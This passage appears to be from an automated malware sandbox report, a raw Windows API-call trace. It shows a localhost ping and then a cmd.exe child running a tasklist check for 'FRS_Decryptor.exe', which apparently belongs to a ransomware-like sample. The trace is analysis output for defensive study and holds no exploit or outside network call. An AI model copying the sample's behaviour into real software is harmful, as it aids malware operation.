_File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0126.507] LocalFree (hMem=0x7b7fd8) returned 0x0 [0126.507] LocalFree (hMem=0x7b7fa0) returned 0x0 [0126.507] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="羠{ﴔ_⛿\x94䰨盪✼") returned 0x9 [0126.507] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _get_osfhandle (_FileHandle=1) returned 0x28 [0126.507] GetFileType (hFile=0x28) returned 0x2 [0126.507] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0126.507] GetLastError () returned 0x6 [0126.507] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✼") returned 0x0 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0126.507] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.507] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a8a00 [0126.507] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x7a8a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _write (in: _FileHandle=1, _Buf=0x7a8a00*, _MaxCharCount=0x9 | out: _Buf=0x7a8a00*) returned 9 [0126.507] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.507] _fileno (_File=0x76ea4c28) returned 1 [0126.507] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0126.507] LocalFree (hMem=0x7a8a00) returned 0x0 [0126.508] LocalFree (hMem=0x7b7fa0) returned 0x0 [0126.508] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5ff344, nSize=0x0, Arguments=0x5ff340 | out: lpBuffer="羠{ﴔ_➷\x94䰨盪✧") returned 0x9 [0126.508] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _get_osfhandle (_FileHandle=1) returned 0x28 [0126.508] GetFileType (hFile=0x28) returned 0x2 [0126.508] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff308 | out: lpMode=0x5ff308) returned 0 [0126.508] GetLastError () returned 0x6 [0126.508] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff26c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0126.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.508] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a89a0 [0126.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x7a89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _write (in: _FileHandle=1, _Buf=0x7a89a0*, _MaxCharCount=0x9 | out: _Buf=0x7a89a0*) returned 9 [0126.508] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0126.508] LocalFree (hMem=0x7a89a0) returned 0x0 [0126.508] LocalFree (hMem=0x7b7fa0) returned 0x0 [0126.508] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="羠{ﴔ_⟘\x94䰨盪✨") returned 0x9 [0126.508] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _get_osfhandle (_FileHandle=1) returned 0x28 [0126.508] GetFileType (hFile=0x28) returned 0x2 [0126.508] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0126.508] GetLastError () returned 0x6 [0126.508] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✨") returned 0x0 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0126.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.508] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a89a0 [0126.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x7a89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _write (in: _FileHandle=1, _Buf=0x7a89a0*, _MaxCharCount=0x9 | out: _Buf=0x7a89a0*) returned 9 [0126.508] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0126.508] _fileno (_File=0x76ea4c28) returned 1 [0126.508] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0126.508] LocalFree (hMem=0x7a89a0) returned 0x0 [0126.509] LocalFree (hMem=0x7b7fa0) returned 0x0 [0126.509] Sleep (dwMilliseconds=0x3e8) [0127.521] IcmpSendEcho2Ex (in: IcmpHandle=0x7a6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x7ac228, RequestSize=0x20, RequestOptions=0x5ff3bc, ReplyBuffer=0x7b5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x7b5270) returned 0x1 [0127.522] InetNtopW (in: Family=2, pAddr=0x5ff3ac, pStringBuf=0x5ff4d4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0127.522] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="羠{ﴔ_⛔\x94䰨盪✣") returned 0x16 [0127.522] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.522] GetFileType (hFile=0x28) returned 0x2 [0127.522] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0127.522] GetLastError () returned 0x6 [0127.522] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✣") returned 0x0 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0127.522] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0127.522] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7b7fd8 [0127.522] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x7b7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _write (in: _FileHandle=1, _Buf=0x7b7fd8*, _MaxCharCount=0x16 | out: _Buf=0x7b7fd8*) returned 22 [0127.522] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0127.522] LocalFree (hMem=0x7b7fd8) returned 0x0 [0127.522] LocalFree (hMem=0x7b7fa0) returned 0x0 [0127.522] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="羠{ﴔ_⛿\x94䰨盪✼") returned 0x9 [0127.522] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.522] GetFileType (hFile=0x28) returned 0x2 [0127.522] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0127.522] GetLastError () returned 0x6 [0127.522] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✼") returned 0x0 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0127.522] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.522] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a89a0 [0127.522] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x7a89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.522] _write (in: _FileHandle=1, _Buf=0x7a89a0*, _MaxCharCount=0x9 | out: _Buf=0x7a89a0*) returned 9 [0127.522] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.522] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0127.523] LocalFree (hMem=0x7a89a0) returned 0x0 [0127.523] LocalFree (hMem=0x7b7fa0) returned 0x0 [0127.523] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x5ff344, nSize=0x0, Arguments=0x5ff340 | out: lpBuffer="羠{ﴔ_➷\x94䰨盪✧") returned 0x9 [0127.523] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.523] GetFileType (hFile=0x28) returned 0x2 [0127.523] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff308 | out: lpMode=0x5ff308) returned 0 [0127.523] GetLastError () returned 0x6 [0127.523] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff26c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0127.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.523] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a8a78 [0127.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x7a8a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _write (in: _FileHandle=1, _Buf=0x7a8a78*, _MaxCharCount=0x9 | out: _Buf=0x7a8a78*) returned 9 [0127.523] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0127.523] LocalFree (hMem=0x7a8a78) returned 0x0 [0127.523] LocalFree (hMem=0x7b7fa0) returned 0x0 [0127.523] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x5ff340, nSize=0x0, Arguments=0x5ff33c | out: lpBuffer="羠{ﴔ_⟘\x94䰨盪✨") returned 0x9 [0127.523] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.523] GetFileType (hFile=0x28) returned 0x2 [0127.523] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff304 | out: lpMode=0x5ff304) returned 0 [0127.523] GetLastError () returned 0x6 [0127.523] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff268, nSize=0x50 | out: lpBuffer="_✨") returned 0x0 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0127.523] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x7a89a0 [0127.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x7a89a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _write (in: _FileHandle=1, _Buf=0x7a89a0*, _MaxCharCount=0x9 | out: _Buf=0x7a89a0*) returned 9 [0127.523] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.523] _fileno (_File=0x76ea4c28) returned 1 [0127.523] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.523] LocalFree (hMem=0x7a89a0) returned 0x0 [0127.523] LocalFree (hMem=0x7b7fa0) returned 0x0 [0127.523] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x5ff2c8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0127.524] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x5ff29c, nSize=0x0, Arguments=0x5ff298 | out: lpBuffer="羠{_᧰\x94䰨盪❏") returned 0x5c [0127.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.524] GetFileType (hFile=0x28) returned 0x2 [0127.524] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff260 | out: lpMode=0x5ff260) returned 0 [0127.524] GetLastError () returned 0x6 [0127.524] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff1c4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0127.524] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x7b8068 [0127.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x7b8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _write (in: _FileHandle=1, _Buf=0x7b8068*, _MaxCharCount=0x5c | out: _Buf=0x7b8068*) returned 92 [0127.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.524] LocalFree (hMem=0x7b8068) returned 0x0 [0127.524] LocalFree (hMem=0x7b7fa0) returned 0x0 [0127.524] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x5ff2a8, nSize=0x0, Arguments=0x5ff2a4 | out: lpBuffer="羠{_ᨧ\x94䰨盪❓") returned 0x61 [0127.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.524] GetFileType (hFile=0x28) returned 0x2 [0127.524] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5ff26c | out: lpMode=0x5ff26c) returned 0 [0127.524] GetLastError () returned 0x6 [0127.524] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5ff1d0, nSize=0x50 | out: lpBuffer="_❓") returned 0x0 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0127.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0127.524] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x7b8070 [0127.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x7b8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _write (in: _FileHandle=1, _Buf=0x7b8070*, _MaxCharCount=0x61 | out: _Buf=0x7b8070*) returned 97 [0127.524] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0127.524] _fileno (_File=0x76ea4c28) returned 1 [0127.524] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0127.524] LocalFree (hMem=0x7b8070) returned 0x0 [0127.524] LocalFree (hMem=0x7b7fa0) returned 0x0 [0127.524] IcmpCloseHandle (IcmpHandle=0x7a6c98) returned 1 [0127.525] LocalFree (hMem=0x7ac228) returned 0x0 [0127.525] LocalFree (hMem=0x7b5270) returned 0x0 [0127.525] WSACleanup () returned 0 [0127.525] exit (_Code=0) Thread: id = 383 os_tid = 0xa58 Thread: id = 384 os_tid = 0xa08 Process: id = "135" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x22799000" os_pid = "0x74c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6987 start_va = 0x380000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 6988 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6989 start_va = 0x3b0000 end_va = 0x3befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 6990 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 6991 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6992 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 6993 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6994 start_va = 0x520000 end_va = 0x521fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6995 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6996 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6997 start_va = 0x7ee50000 end_va = 0x7ee72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee50000" filename = "" Region: id = 6998 start_va = 0x7ee7b000 end_va = 0x7ee7dfff entry_point = 0x0 region_type = private name = "private_0x000000007ee7b000" filename = "" Region: id = 6999 start_va = 0x7ee7e000 end_va = 0x7ee7efff entry_point = 0x0 region_type = private name = "private_0x000000007ee7e000" filename = "" Region: id = 7000 start_va = 0x7ee7f000 end_va = 0x7ee7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee7f000" filename = "" Region: id = 7001 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7002 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7003 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7004 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7005 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7006 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7007 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7008 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7009 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 7010 start_va = 0x530000 end_va = 0x5adfff entry_point = 0x530000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7011 start_va = 0x630000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 7012 start_va = 0x820000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 7013 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7014 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7015 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7016 start_va = 0x7ed50000 end_va = 0x7ee4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed50000" filename = "" Region: id = 7017 start_va = 0x390000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 7018 start_va = 0x830000 end_va = 0xb04fff entry_point = 0x830000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7037 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Thread: id = 385 os_tid = 0x508 [0127.553] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0127.554] __set_app_type (_Type=0x1) [0127.554] __p__fmode () returned 0x76ea1768 [0127.554] __p__commode () returned 0x76ea176c [0127.554] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0127.554] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0127.554] GetCurrentThreadId () returned 0x508 [0127.554] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x508) returned 0x34 [0127.554] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0127.554] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0127.554] SetThreadUILanguage 